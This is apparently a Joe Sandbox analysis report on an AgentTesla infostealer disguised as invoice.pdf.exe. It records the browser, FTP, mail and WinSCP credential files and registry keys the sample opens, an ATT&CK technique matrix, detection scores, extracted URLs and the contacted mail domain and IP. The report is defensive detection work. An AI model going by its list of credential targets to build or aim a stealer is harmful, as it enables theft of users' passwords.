Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.508855968.0000000003B2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.501365134.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.pdf.exe PID: 6496, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.pdf.exe PID: 6580, type: MEMORY
Source: Yara match	File source: 1.2.invoice.pdf.exe.39bf710.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.invoice.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.invoice.pdf.exe.39bf710.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.invoice.pdf.exe.38c2460.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.invoice.pdf.exe.3866c40.2.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.pdf.exe PID: 6580, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.508855968.0000000003B2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.501365134.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.pdf.exe PID: 6496, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.pdf.exe PID: 6580, type: MEMORY
Source: Yara match	File source: 1.2.invoice.pdf.exe.39bf710.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.invoice.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.invoice.pdf.exe.39bf710.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.invoice.pdf.exe.38c2460.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.invoice.pdf.exe.3866c40.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping2	System Information Discovery114	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Input Capture11	Query Registry1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Obfuscated Files or Information131	Credentials in Registry1	Security Software Discovery211	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing3	NTDS	Virtualization/Sandbox Evasion13	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Process Discovery2	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading11	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion13	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection112	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
invoice.pdf.exe	34%	Virustotal		Browse
invoice.pdf.exe	21%	ReversingLabs	Win32.Trojan.Wacatac
invoice.pdf.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.invoice.pdf.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://www.carterandcone.comechP	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/eO	0%	Avira URL Cloud	safe
http://www.carterandcone.comeac	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com.TTFnO	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/nO	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/tN	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/-OQ	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.fontbureau.comAO	0%	Avira URL Cloud	safe
http://HtsCZk.com	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.carterandcone.comext	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://www.fontbureau.comgrita$OX	0%	Avira URL Cloud	safe
http://www.carterandcone.coma	0%	URL Reputation	safe
http://www.carterandcone.coma	0%	URL Reputation	safe
http://www.carterandcone.coma	0%	URL Reputation	safe
http://www.fontbureau.comdiaoJO	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/JO	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y0anSO7	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://www.carterandcone.comati	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://www.carterandcone.comd	0%	URL Reputation	safe
http://www.carterandcone.comd	0%	URL Reputation	safe
http://www.carterandcone.comd	0%	URL Reputation	safe
https://MFtHNrHfTnJ.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/JO	0%	Avira URL Cloud	safe
http://www.gagalive.kr/livechat1.swf?chatroom=inchat-	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/on	0%	Avira URL Cloud	safe
http://www.fontbureau.comeO	0%	Avira URL Cloud	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/6OJ	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/s	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/s	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.com-cept.com	185.221.216.77	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designersG	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comechP	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/eO	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comeac	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com.TTFnO	invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/nO	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/tN	invoice.pdf.exe, 00000001.00000003.233778392.0000000004B89000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/-OQ	invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comAO	invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://HtsCZk.com	invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comext	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%GETMozilla/5.0	invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%	invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	invoice.pdf.exe, 00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp, invoice.pdf.exe, 00000002.00000002.501365134.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schooldb.inchat.kro.kr/	invoice.pdf.exe	false		high
http://www.fontbureau.comgrita$OX	invoice.pdf.exe, 00000001.00000003.239621781.0000000004B75000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.carterandcone.coma	invoice.pdf.exe, 00000001.00000003.233981816.0000000004B84000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comdiaoJO	invoice.pdf.exe, 00000001.00000003.239621781.0000000004B75000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/JO	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/Y0anSO7	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNS	invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comati	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	invoice.pdf.exe, 00000002.00000002.507278003.0000000003719000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://inchat.kro.kr	invoice.pdf.exe	false		high
http://www.carterandcone.comd	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://MFtHNrHfTnJ.net	invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/JO	invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gagalive.kr/livechat1.swf?chatroom=inchat-	invoice.pdf.exe	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/on	invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comeO	invoice.pdf.exe, 00000001.00000003.239621781.0000000004B75000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comd	invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/6OJ	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/s	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/$OX	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comessedwO	invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/ConnAO	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comang	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comituF$OX	invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/vv	invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/-OQ	invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.221.216.77	unknown	United Kingdom		393960	HOST4GEEKS-LLCUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	358190
Start date:	25.02.2021
Start time:	07:44:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	invoice.pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
